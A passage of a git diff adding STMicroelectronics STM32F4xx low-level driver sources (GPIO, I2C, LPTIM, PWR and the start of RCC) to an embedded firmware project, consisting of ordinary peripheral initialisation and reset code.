((__VALUE__) == LL_GPIO_AF_7 ) ||\ + ((__VALUE__) == LL_GPIO_AF_8 ) ||\ + ((__VALUE__) == LL_GPIO_AF_9 ) ||\ + ((__VALUE__) == LL_GPIO_AF_10 ) ||\ + ((__VALUE__) == LL_GPIO_AF_11 ) ||\ + ((__VALUE__) == LL_GPIO_AF_12 ) ||\ + ((__VALUE__) == LL_GPIO_AF_13 ) ||\ + ((__VALUE__) == LL_GPIO_AF_14 ) ||\ + ((__VALUE__) == LL_GPIO_AF_15 )) +/** + * @} + */ + +/* Private function prototypes -----------------------------------------------*/ + +/* Exported functions --------------------------------------------------------*/ +/** @addtogroup GPIO_LL_Exported_Functions + * @{ + */ + +/** @addtogroup GPIO_LL_EF_Init + * @{ + */ + +/** + * @brief De-initialize GPIO registers (Registers restored to their default values). + * @param GPIOx GPIO Port + * @retval An ErrorStatus enumeration value: + * - SUCCESS: GPIO registers are de-initialized + * - ERROR: Wrong GPIO Port + */ +ErrorStatus LL_GPIO_DeInit(GPIO_TypeDef *GPIOx) +{ + ErrorStatus status = SUCCESS; + + /* Check the parameters */ + assert_param(IS_GPIO_ALL_INSTANCE(GPIOx)); + + /* Force and Release reset on clock of GPIOx Port */ + if (GPIOx == GPIOA) + { + LL_AHB1_GRP1_ForceReset(LL_AHB1_GRP1_PERIPH_GPIOA); + LL_AHB1_GRP1_ReleaseReset(LL_AHB1_GRP1_PERIPH_GPIOA); + } + else if (GPIOx == GPIOB) + { + LL_AHB1_GRP1_ForceReset(LL_AHB1_GRP1_PERIPH_GPIOB); + LL_AHB1_GRP1_ReleaseReset(LL_AHB1_GRP1_PERIPH_GPIOB); + } + else if (GPIOx == GPIOC) + { + LL_AHB1_GRP1_ForceReset(LL_AHB1_GRP1_PERIPH_GPIOC); + LL_AHB1_GRP1_ReleaseReset(LL_AHB1_GRP1_PERIPH_GPIOC); + } +#if defined(GPIOD) + else if (GPIOx == GPIOD) + { + LL_AHB1_GRP1_ForceReset(LL_AHB1_GRP1_PERIPH_GPIOD); + LL_AHB1_GRP1_ReleaseReset(LL_AHB1_GRP1_PERIPH_GPIOD); + } +#endif /* GPIOD */ +#if defined(GPIOE) + else if (GPIOx == GPIOE) + { + LL_AHB1_GRP1_ForceReset(LL_AHB1_GRP1_PERIPH_GPIOE); + LL_AHB1_GRP1_ReleaseReset(LL_AHB1_GRP1_PERIPH_GPIOE); + } +#endif /* GPIOE */ +#if defined(GPIOF) + else if (GPIOx == GPIOF) + { + LL_AHB1_GRP1_ForceReset(LL_AHB1_GRP1_PERIPH_GPIOF); + LL_AHB1_GRP1_ReleaseReset(LL_AHB1_GRP1_PERIPH_GPIOF); + } +#endif /* GPIOF */ +#if defined(GPIOG) + else if (GPIOx == GPIOG) + { + LL_AHB1_GRP1_ForceReset(LL_AHB1_GRP1_PERIPH_GPIOG); + LL_AHB1_GRP1_ReleaseReset(LL_AHB1_GRP1_PERIPH_GPIOG); + } +#endif /* GPIOG */ +#if defined(GPIOH) + else if (GPIOx == GPIOH) + { + LL_AHB1_GRP1_ForceReset(LL_AHB1_GRP1_PERIPH_GPIOH); + LL_AHB1_GRP1_ReleaseReset(LL_AHB1_GRP1_PERIPH_GPIOH); + } +#endif /* GPIOH */ +#if defined(GPIOI) + else if (GPIOx == GPIOI) + { + LL_AHB1_GRP1_ForceReset(LL_AHB1_GRP1_PERIPH_GPIOI); + LL_AHB1_GRP1_ReleaseReset(LL_AHB1_GRP1_PERIPH_GPIOI); + } +#endif /* GPIOI */ +#if defined(GPIOJ) + else if (GPIOx == GPIOJ) + { + LL_AHB1_GRP1_ForceReset(LL_AHB1_GRP1_PERIPH_GPIOJ); + LL_AHB1_GRP1_ReleaseReset(LL_AHB1_GRP1_PERIPH_GPIOJ); + } +#endif /* GPIOJ */ +#if defined(GPIOK) + else if (GPIOx == GPIOK) + { + LL_AHB1_GRP1_ForceReset(LL_AHB1_GRP1_PERIPH_GPIOK); + LL_AHB1_GRP1_ReleaseReset(LL_AHB1_GRP1_PERIPH_GPIOK); + } +#endif /* GPIOK */ + else + { + status = ERROR; + } + + return (status); +} + +/** + * @brief Initialize GPIO registers according to the specified parameters in GPIO_InitStruct. + * @param GPIOx GPIO Port + * @param GPIO_InitStruct pointer to a @ref LL_GPIO_InitTypeDef structure + * that contains the configuration information for the specified GPIO peripheral. + * @retval An ErrorStatus enumeration value: + * - SUCCESS: GPIO registers are initialized according to GPIO_InitStruct content + * - ERROR: Not applicable + */ +ErrorStatus LL_GPIO_Init(GPIO_TypeDef *GPIOx, LL_GPIO_InitTypeDef *GPIO_InitStruct) +{ + uint32_t pinpos = 0x00000000U; + uint32_t currentpin = 0x00000000U; + + /* Check the parameters */ + assert_param(IS_GPIO_ALL_INSTANCE(GPIOx)); + assert_param(IS_LL_GPIO_PIN(GPIO_InitStruct->Pin)); + assert_param(IS_LL_GPIO_MODE(GPIO_InitStruct->Mode)); + assert_param(IS_LL_GPIO_PULL(GPIO_InitStruct->Pull)); + + /* ------------------------- Configure the port pins ---------------- */ + /* Initialize pinpos on first pin set */ + pinpos = POSITION_VAL(GPIO_InitStruct->Pin); + + /* Configure the port pins */ + while (((GPIO_InitStruct->Pin) >> pinpos) != 0x00000000U) + { + /* Get current io position */ + currentpin = (GPIO_InitStruct->Pin) & (0x00000001U << pinpos); + + if (currentpin) + { + + if ((GPIO_InitStruct->Mode == LL_GPIO_MODE_OUTPUT) || (GPIO_InitStruct->Mode == LL_GPIO_MODE_ALTERNATE)) + { + /* Check Speed mode parameters */ + assert_param(IS_LL_GPIO_SPEED(GPIO_InitStruct->Speed)); + + /* Speed mode configuration */ + LL_GPIO_SetPinSpeed(GPIOx, currentpin, GPIO_InitStruct->Speed); + + /* Check Output mode parameters */ + assert_param(IS_LL_GPIO_OUTPUT_TYPE(GPIO_InitStruct->OutputType)); + + /* Output mode configuration*/ + LL_GPIO_SetPinOutputType(GPIOx, currentpin, GPIO_InitStruct->OutputType); + } + + /* Pull-up Pull down resistor configuration*/ + LL_GPIO_SetPinPull(GPIOx, currentpin, GPIO_InitStruct->Pull); + + if (GPIO_InitStruct->Mode == LL_GPIO_MODE_ALTERNATE) + { + /* Check Alternate parameter */ + assert_param(IS_LL_GPIO_ALTERNATE(GPIO_InitStruct->Alternate)); + + /* Speed mode configuration */ + if (POSITION_VAL(currentpin) < 0x00000008U) + { + LL_GPIO_SetAFPin_0_7(GPIOx, currentpin, GPIO_InitStruct->Alternate); + } + else + { + LL_GPIO_SetAFPin_8_15(GPIOx, currentpin, GPIO_InitStruct->Alternate); + } + } + + /* Pin Mode configuration */ + LL_GPIO_SetPinMode(GPIOx, currentpin, GPIO_InitStruct->Mode); + } + pinpos++; + } + + return (SUCCESS); +} + +/** + * @brief Set each @ref LL_GPIO_InitTypeDef field to default value. + * @param GPIO_InitStruct pointer to a @ref LL_GPIO_InitTypeDef structure + * whose fields will be set to default values. + * @retval None + */ + +void LL_GPIO_StructInit(LL_GPIO_InitTypeDef *GPIO_InitStruct) +{ + /* Reset GPIO init structure parameters values */ + GPIO_InitStruct->Pin = LL_GPIO_PIN_ALL; + GPIO_InitStruct->Mode = LL_GPIO_MODE_ANALOG; + GPIO_InitStruct->Speed = LL_GPIO_SPEED_FREQ_LOW; + GPIO_InitStruct->OutputType = LL_GPIO_OUTPUT_PUSHPULL; + GPIO_InitStruct->Pull = LL_GPIO_PULL_NO; + GPIO_InitStruct->Alternate = LL_GPIO_AF_0; +} + +/** + * @} + */ + +/** + * @} + */ + +/** + * @} + */ + +#endif /* defined (GPIOA) || defined (GPIOB) || defined (GPIOC) || defined (GPIOD) || defined (GPIOE) || defined (GPIOF) || defined (GPIOG) || defined (GPIOH) || defined (GPIOI) || defined (GPIOJ) || defined (GPIOK) */ + +/** + * @} + */ + +#endif /* USE_FULL_LL_DRIVER */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_i2c.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_i2c.c new file mode 100644 index 000000000..125fb2ca1 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_i2c.c @@ -0,0 +1,253 @@ +/** + ****************************************************************************** + * @file stm32f4xx_ll_i2c.c + * @author MCD Application Team + * @brief I2C LL module driver. + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ +#if defined(USE_FULL_LL_DRIVER) + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_ll_i2c.h" +#include "stm32f4xx_ll_bus.h" +#include "stm32f4xx_ll_rcc.h" +#ifdef USE_FULL_ASSERT +#include "stm32_assert.h" +#else +#define assert_param(expr) ((void)0U) +#endif + +/** @addtogroup STM32F4xx_LL_Driver + * @{ + */ + +#if defined (I2C1) || defined (I2C2) || defined (I2C3) + +/** @defgroup I2C_LL I2C + * @{ + */ + +/* Private types -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private constants ---------------------------------------------------------*/ +/* Private macros ------------------------------------------------------------*/ +/** @addtogroup I2C_LL_Private_Macros + * @{ + */ + +#define IS_LL_I2C_PERIPHERAL_MODE(__VALUE__) (((__VALUE__) == LL_I2C_MODE_I2C) || \ + ((__VALUE__) == LL_I2C_MODE_SMBUS_HOST) || \ + ((__VALUE__) == LL_I2C_MODE_SMBUS_DEVICE) || \ + ((__VALUE__) == LL_I2C_MODE_SMBUS_DEVICE_ARP)) + +#define IS_LL_I2C_CLOCK_SPEED(__VALUE__) (((__VALUE__) > 0U) && ((__VALUE__) <= LL_I2C_MAX_SPEED_FAST)) + +#define IS_LL_I2C_DUTY_CYCLE(__VALUE__) (((__VALUE__) == LL_I2C_DUTYCYCLE_2) || \ + ((__VALUE__) == LL_I2C_DUTYCYCLE_16_9)) + +#if defined(I2C_FLTR_ANOFF)&&defined(I2C_FLTR_DNF) +#define IS_LL_I2C_ANALOG_FILTER(__VALUE__) (((__VALUE__) == LL_I2C_ANALOGFILTER_ENABLE) || \ + ((__VALUE__) == LL_I2C_ANALOGFILTER_DISABLE)) + +#define IS_LL_I2C_DIGITAL_FILTER(__VALUE__) ((__VALUE__) <= 0x0000000FU) + +#endif +#define IS_LL_I2C_OWN_ADDRESS1(__VALUE__) ((__VALUE__) <= 0x000003FFU) + +#define IS_LL_I2C_TYPE_ACKNOWLEDGE(__VALUE__) (((__VALUE__) == LL_I2C_ACK) || \ + ((__VALUE__) == LL_I2C_NACK)) + +#define IS_LL_I2C_OWN_ADDRSIZE(__VALUE__) (((__VALUE__) == LL_I2C_OWNADDRESS1_7BIT) || \ + ((__VALUE__) == LL_I2C_OWNADDRESS1_10BIT)) +/** + * @} + */ + +/* Private function prototypes -----------------------------------------------*/ + +/* Exported functions --------------------------------------------------------*/ +/** @addtogroup I2C_LL_Exported_Functions + * @{ + */ + +/** @addtogroup I2C_LL_EF_Init + * @{ + */ + +/** + * @brief De-initialize the I2C registers to their default reset values. + * @param I2Cx I2C Instance. + * @retval An ErrorStatus enumeration value: + * - SUCCESS I2C registers are de-initialized + * - ERROR I2C registers are not de-initialized + */ +uint32_t LL_I2C_DeInit(I2C_TypeDef *I2Cx) +{ + ErrorStatus status = SUCCESS; + + /* Check the I2C Instance I2Cx */ + assert_param(IS_I2C_ALL_INSTANCE(I2Cx)); + + if (I2Cx == I2C1) + { + /* Force reset of I2C clock */ + LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_I2C1); + + /* Release reset of I2C clock */ + LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_I2C1); + } + else if (I2Cx == I2C2) + { + /* Force reset of I2C clock */ + LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_I2C2); + + /* Release reset of I2C clock */ + LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_I2C2); + + } +#if defined(I2C3) + else if (I2Cx == I2C3) + { + /* Force reset of I2C clock */ + LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_I2C3); + + /* Release reset of I2C clock */ + LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_I2C3); + } +#endif + else + { + status = ERROR; + } + + return status; +} + +/** + * @brief Initialize the I2C registers according to the specified parameters in I2C_InitStruct. + * @param I2Cx I2C Instance. + * @param I2C_InitStruct pointer to a @ref LL_I2C_InitTypeDef structure. + * @retval An ErrorStatus enumeration value: + * - SUCCESS I2C registers are initialized + * - ERROR Not applicable + */ +uint32_t LL_I2C_Init(I2C_TypeDef *I2Cx, LL_I2C_InitTypeDef *I2C_InitStruct) +{ + LL_RCC_ClocksTypeDef rcc_clocks; + + /* Check the I2C Instance I2Cx */ + assert_param(IS_I2C_ALL_INSTANCE(I2Cx)); + + /* Check the I2C parameters from I2C_InitStruct */ + assert_param(IS_LL_I2C_PERIPHERAL_MODE(I2C_InitStruct->PeripheralMode)); + assert_param(IS_LL_I2C_CLOCK_SPEED(I2C_InitStruct->ClockSpeed)); + assert_param(IS_LL_I2C_DUTY_CYCLE(I2C_InitStruct->DutyCycle)); +#if defined(I2C_FLTR_ANOFF)&&defined(I2C_FLTR_DNF) + assert_param(IS_LL_I2C_ANALOG_FILTER(I2C_InitStruct->AnalogFilter)); + assert_param(IS_LL_I2C_DIGITAL_FILTER(I2C_InitStruct->DigitalFilter)); +#endif + assert_param(IS_LL_I2C_OWN_ADDRESS1(I2C_InitStruct->OwnAddress1)); + assert_param(IS_LL_I2C_TYPE_ACKNOWLEDGE(I2C_InitStruct->TypeAcknowledge)); + assert_param(IS_LL_I2C_OWN_ADDRSIZE(I2C_InitStruct->OwnAddrSize)); + + /* Disable the selected I2Cx Peripheral */ + LL_I2C_Disable(I2Cx); + + /* Retrieve Clock frequencies */ + LL_RCC_GetSystemClocksFreq(&rcc_clocks); + +#if defined(I2C_FLTR_ANOFF)&&defined(I2C_FLTR_DNF) + /*---------------------------- I2Cx FLTR Configuration ----------------------- + * Configure the analog and digital noise filters with parameters : + * - AnalogFilter: I2C_FLTR_ANFOFF bit + * - DigitalFilter: I2C_FLTR_DNF[3:0] bits + */ + LL_I2C_ConfigFilters(I2Cx, I2C_InitStruct->AnalogFilter, I2C_InitStruct->DigitalFilter); + +#endif + /*---------------------------- I2Cx SCL Clock Speed Configuration ------------ + * Configure the SCL speed : + * - ClockSpeed: I2C_CR2_FREQ[5:0], I2C_TRISE_TRISE[5:0], I2C_CCR_FS, + * and I2C_CCR_CCR[11:0] bits + * - DutyCycle: I2C_CCR_DUTY[7:0] bits + */ + LL_I2C_ConfigSpeed(I2Cx, rcc_clocks.PCLK1_Frequency, I2C_InitStruct->ClockSpeed, I2C_InitStruct->DutyCycle); + + /*---------------------------- I2Cx OAR1 Configuration ----------------------- + * Disable, Configure and Enable I2Cx device own address 1 with parameters : + * - OwnAddress1: I2C_OAR1_ADD[9:8], I2C_OAR1_ADD[7:1] and I2C_OAR1_ADD0 bits + * - OwnAddrSize: I2C_OAR1_ADDMODE bit + */ + LL_I2C_SetOwnAddress1(I2Cx, I2C_InitStruct->OwnAddress1, I2C_InitStruct->OwnAddrSize); + + /*---------------------------- I2Cx MODE Configuration ----------------------- + * Configure I2Cx peripheral mode with parameter : + * - PeripheralMode: I2C_CR1_SMBUS, I2C_CR1_SMBTYPE and I2C_CR1_ENARP bits + */ + LL_I2C_SetMode(I2Cx, I2C_InitStruct->PeripheralMode); + + /* Enable the selected I2Cx Peripheral */ + LL_I2C_Enable(I2Cx); + + /*---------------------------- I2Cx CR2 Configuration ------------------------ + * Configure the ACKnowledge or Non ACKnowledge condition + * after the address receive match code or next received byte with parameter : + * - TypeAcknowledge: I2C_CR2_NACK bit + */ + LL_I2C_AcknowledgeNextData(I2Cx, I2C_InitStruct->TypeAcknowledge); + + return SUCCESS; +} + +/** + * @brief Set each @ref LL_I2C_InitTypeDef field to default value. + * @param I2C_InitStruct Pointer to a @ref LL_I2C_InitTypeDef structure. + * @retval None + */ +void LL_I2C_StructInit(LL_I2C_InitTypeDef *I2C_InitStruct) +{ + /* Set I2C_InitStruct fields to default values */ + I2C_InitStruct->PeripheralMode = LL_I2C_MODE_I2C; + I2C_InitStruct->ClockSpeed = 5000U; + I2C_InitStruct->DutyCycle = LL_I2C_DUTYCYCLE_2; +#if defined(I2C_FLTR_ANOFF)&&defined(I2C_FLTR_DNF) + I2C_InitStruct->AnalogFilter = LL_I2C_ANALOGFILTER_ENABLE; + I2C_InitStruct->DigitalFilter = 0U; +#endif + I2C_InitStruct->OwnAddress1 = 0U; + I2C_InitStruct->TypeAcknowledge = LL_I2C_NACK; + I2C_InitStruct->OwnAddrSize = LL_I2C_OWNADDRESS1_7BIT; +} + +/** + * @} + */ + +/** + * @} + */ + +/** + * @} + */ + +#endif /* I2C1 || I2C2 || I2C3 */ + +/** + * @} + */ + +#endif /* USE_FULL_LL_DRIVER */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_lptim.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_lptim.c new file mode 100644 index 000000000..780961d58 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_lptim.c @@ -0,0 +1,300 @@ +/** + ****************************************************************************** + * @file stm32f4xx_ll_lptim.c + * @author MCD Application Team + * @brief LPTIM LL module driver. + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ +#if defined(USE_FULL_LL_DRIVER) + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_ll_lptim.h" +#include "stm32f4xx_ll_bus.h" +#include "stm32f4xx_ll_rcc.h" + + +#ifdef USE_FULL_ASSERT +#include "stm32_assert.h" +#else +#define assert_param(expr) ((void)0U) +#endif /* USE_FULL_ASSERT */ + +/** @addtogroup STM32F4xx_LL_Driver + * @{ + */ + +#if defined (LPTIM1) + +/** @addtogroup LPTIM_LL + * @{ + */ + +/* Private types -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private constants ---------------------------------------------------------*/ +/* Private macros ------------------------------------------------------------*/ +/** @addtogroup LPTIM_LL_Private_Macros + * @{ + */ +#define IS_LL_LPTIM_CLOCK_SOURCE(__VALUE__) (((__VALUE__) == LL_LPTIM_CLK_SOURCE_INTERNAL) \ + || ((__VALUE__) == LL_LPTIM_CLK_SOURCE_EXTERNAL)) + +#define IS_LL_LPTIM_CLOCK_PRESCALER(__VALUE__) (((__VALUE__) == LL_LPTIM_PRESCALER_DIV1) \ + || ((__VALUE__) == LL_LPTIM_PRESCALER_DIV2) \ + || ((__VALUE__) == LL_LPTIM_PRESCALER_DIV4) \ + || ((__VALUE__) == LL_LPTIM_PRESCALER_DIV8) \ + || ((__VALUE__) == LL_LPTIM_PRESCALER_DIV16) \ + || ((__VALUE__) == LL_LPTIM_PRESCALER_DIV32) \ + || ((__VALUE__) == LL_LPTIM_PRESCALER_DIV64) \ + || ((__VALUE__) == LL_LPTIM_PRESCALER_DIV128)) + +#define IS_LL_LPTIM_WAVEFORM(__VALUE__) (((__VALUE__) == LL_LPTIM_OUTPUT_WAVEFORM_PWM) \ + || ((__VALUE__) == LL_LPTIM_OUTPUT_WAVEFORM_SETONCE)) + +#define IS_LL_LPTIM_OUTPUT_POLARITY(__VALUE__) (((__VALUE__) == LL_LPTIM_OUTPUT_POLARITY_REGULAR) \ + || ((__VALUE__) == LL_LPTIM_OUTPUT_POLARITY_INVERSE)) +/** + * @} + */ + + +/* Private function prototypes -----------------------------------------------*/ +/* Private functions ---------------------------------------------------------*/ +/** @defgroup LPTIM_Private_Functions LPTIM Private Functions + * @{ + */ +/** + * @} + */ +/* Exported functions --------------------------------------------------------*/ +/** @addtogroup LPTIM_LL_Exported_Functions + * @{ + */ + +/** @addtogroup LPTIM_LL_EF_Init + * @{ + */ + +/** + * @brief Set LPTIMx registers to their reset values. + * @param LPTIMx LP Timer instance + * @retval An ErrorStatus enumeration value: + * - SUCCESS: LPTIMx registers are de-initialized + * - ERROR: invalid LPTIMx instance + */ +ErrorStatus LL_LPTIM_DeInit(LPTIM_TypeDef *LPTIMx) +{ + ErrorStatus result = SUCCESS; + + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(LPTIMx)); + + if (LPTIMx == LPTIM1) + { + LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_LPTIM1); + LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_LPTIM1); + } + else + { + result = ERROR; + } + + return result; +} + +/** + * @brief Set each fields of the LPTIM_InitStruct structure to its default + * value. + * @param LPTIM_InitStruct pointer to a @ref LL_LPTIM_InitTypeDef structure + * @retval None + */ +void LL_LPTIM_StructInit(LL_LPTIM_InitTypeDef *LPTIM_InitStruct) +{ + /* Set the default configuration */ + LPTIM_InitStruct->ClockSource = LL_LPTIM_CLK_SOURCE_INTERNAL; + LPTIM_InitStruct->Prescaler = LL_LPTIM_PRESCALER_DIV1; + LPTIM_InitStruct->Waveform = LL_LPTIM_OUTPUT_WAVEFORM_PWM; + LPTIM_InitStruct->Polarity = LL_LPTIM_OUTPUT_POLARITY_REGULAR; +} + +/** + * @brief Configure the LPTIMx peripheral according to the specified parameters. + * @note LL_LPTIM_Init can only be called when the LPTIM instance is disabled. + * @note LPTIMx can be disabled using unitary function @ref LL_LPTIM_Disable(). + * @param LPTIMx LP Timer Instance + * @param LPTIM_InitStruct pointer to a @ref LL_LPTIM_InitTypeDef structure + * @retval An ErrorStatus enumeration value: + * - SUCCESS: LPTIMx instance has been initialized + * - ERROR: LPTIMx instance hasn't been initialized + */ +ErrorStatus LL_LPTIM_Init(LPTIM_TypeDef *LPTIMx, LL_LPTIM_InitTypeDef *LPTIM_InitStruct) +{ + ErrorStatus result = SUCCESS; + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(LPTIMx)); + assert_param(IS_LL_LPTIM_CLOCK_SOURCE(LPTIM_InitStruct->ClockSource)); + assert_param(IS_LL_LPTIM_CLOCK_PRESCALER(LPTIM_InitStruct->Prescaler)); + assert_param(IS_LL_LPTIM_WAVEFORM(LPTIM_InitStruct->Waveform)); + assert_param(IS_LL_LPTIM_OUTPUT_POLARITY(LPTIM_InitStruct->Polarity)); + + /* The LPTIMx_CFGR register must only be modified when the LPTIM is disabled + (ENABLE bit is reset to 0). + */ + if (LL_LPTIM_IsEnabled(LPTIMx) == 1UL) + { + result = ERROR; + } + else + { + /* Set CKSEL bitfield according to ClockSource value */ + /* Set PRESC bitfield according to Prescaler value */ + /* Set WAVE bitfield according to Waveform value */ + /* Set WAVEPOL bitfield according to Polarity value */ + MODIFY_REG(LPTIMx->CFGR, + (LPTIM_CFGR_CKSEL | LPTIM_CFGR_PRESC | LPTIM_CFGR_WAVE | LPTIM_CFGR_WAVPOL), + LPTIM_InitStruct->ClockSource | \ + LPTIM_InitStruct->Prescaler | \ + LPTIM_InitStruct->Waveform | \ + LPTIM_InitStruct->Polarity); + } + + return result; +} + +/** + * @brief Disable the LPTIM instance + * @rmtoll CR ENABLE LL_LPTIM_Disable + * @param LPTIMx Low-Power Timer instance + * @note The following sequence is required to solve LPTIM disable HW limitation. + * Please check Errata Sheet ES0335 for more details under "MCU may remain + * stuck in LPTIM interrupt when entering Stop mode" section. + * @retval None + */ +void LL_LPTIM_Disable(LPTIM_TypeDef *LPTIMx) +{ + LL_RCC_ClocksTypeDef rcc_clock; + uint32_t tmpclksource = 0; + uint32_t tmpIER; + uint32_t tmpCFGR; + uint32_t tmpCMP; + uint32_t tmpARR; + uint32_t tmpOR; + + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(LPTIMx)); + + __disable_irq(); + + /********** Save LPTIM Config *********/ + /* Save LPTIM source clock */ + switch ((uint32_t)LPTIMx) + { + case LPTIM1_BASE: + tmpclksource = LL_RCC_GetLPTIMClockSource(LL_RCC_LPTIM1_CLKSOURCE); + break; + default: + break; + } + + /* Save LPTIM configuration registers */ + tmpIER = LPTIMx->IER; + tmpCFGR = LPTIMx->CFGR; + tmpCMP = LPTIMx->CMP; + tmpARR = LPTIMx->ARR; + tmpOR = LPTIMx->OR; + + /************* Reset LPTIM ************/ + (void)LL_LPTIM_DeInit(LPTIMx); + + /********* Restore LPTIM Config *******/ + LL_RCC_GetSystemClocksFreq(&rcc_clock); + + if ((tmpCMP != 0UL) || (tmpARR != 0UL)) + { + /* Force LPTIM source kernel clock from APB */ + switch ((uint32_t)LPTIMx) + { + case LPTIM1_BASE: + LL_RCC_SetLPTIMClockSource(LL_RCC_LPTIM1_CLKSOURCE_PCLK1); + break; + default: + break; + } + + if (tmpCMP != 0UL) + { + /* Restore CMP and ARR registers (LPTIM should be enabled first) */ + LPTIMx->CR |= LPTIM_CR_ENABLE; + LPTIMx->CMP = tmpCMP; + + /* Polling on CMP write ok status after above restore operation */ + do + { + rcc_clock.SYSCLK_Frequency--; /* Used for timeout */ + } while (((LL_LPTIM_IsActiveFlag_CMPOK(LPTIMx) != 1UL)) && ((rcc_clock.SYSCLK_Frequency) > 0UL)); + + LL_LPTIM_ClearFlag_CMPOK(LPTIMx); + } + + if (tmpARR != 0UL) + { + LPTIMx->CR |= LPTIM_CR_ENABLE; + LPTIMx->ARR = tmpARR; + + LL_RCC_GetSystemClocksFreq(&rcc_clock); + /* Polling on ARR write ok status after above restore operation */ + do + { + rcc_clock.SYSCLK_Frequency--; /* Used for timeout */ + } + while (((LL_LPTIM_IsActiveFlag_ARROK(LPTIMx) != 1UL)) && ((rcc_clock.SYSCLK_Frequency) > 0UL)); + + LL_LPTIM_ClearFlag_ARROK(LPTIMx); + } + + + /* Restore LPTIM source kernel clock */ + LL_RCC_SetLPTIMClockSource(tmpclksource); + } + + /* Restore configuration registers (LPTIM should be disabled first) */ + LPTIMx->CR &= ~(LPTIM_CR_ENABLE); + LPTIMx->IER = tmpIER; + LPTIMx->CFGR = tmpCFGR; + LPTIMx->OR = tmpOR; + + __enable_irq(); +} + +/** + * @} + */ + +/** + * @} + */ + +/** + * @} + */ + +#endif /* LPTIM1 */ + +/** + * @} + */ + +#endif /* USE_FULL_LL_DRIVER */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_pwr.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_pwr.c new file mode 100644 index 000000000..fe04bc44c --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_pwr.c @@ -0,0 +1,85 @@ +/** + ****************************************************************************** + * @file stm32f4xx_ll_pwr.c + * @author MCD Application Team + * @brief PWR LL module driver. + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ +#if defined(USE_FULL_LL_DRIVER) + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_ll_pwr.h" +#include "stm32f4xx_ll_bus.h" + +/** @addtogroup STM32F4xx_LL_Driver + * @{ + */ + +#if defined(PWR) + +/** @defgroup PWR_LL PWR + * @{ + */ + +/* Private types -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private constants ---------------------------------------------------------*/ +/* Private macros ------------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ + +/* Exported functions --------------------------------------------------------*/ +/** @addtogroup PWR_LL_Exported_Functions + * @{ + */ + +/** @addtogroup PWR_LL_EF_Init + * @{ + */ + +/** + * @brief De-initialize the PWR registers to their default reset values. + * @retval An ErrorStatus enumeration value: + * - SUCCESS: PWR registers are de-initialized + * - ERROR: not applicable + */ +ErrorStatus LL_PWR_DeInit(void) +{ + /* Force reset of PWR clock */ + LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_PWR); + + /* Release reset of PWR clock */ + LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_PWR); + + return SUCCESS; +} + +/** + * @} + */ + +/** + * @} + */ + +/** + * @} + */ +#endif /* defined(PWR) */ +/** + * @} + */ + +#endif /* USE_FULL_LL_DRIVER */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_rcc.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_rcc.c new file mode 100644 index 000000000..ea18adc32 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_rcc.c @@ -0,0 +1,1663 @@ +/** + ****************************************************************************** + * @file stm32f4xx_ll_rcc.c + * @author MCD Application Team + * @brief RCC LL module driver. + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

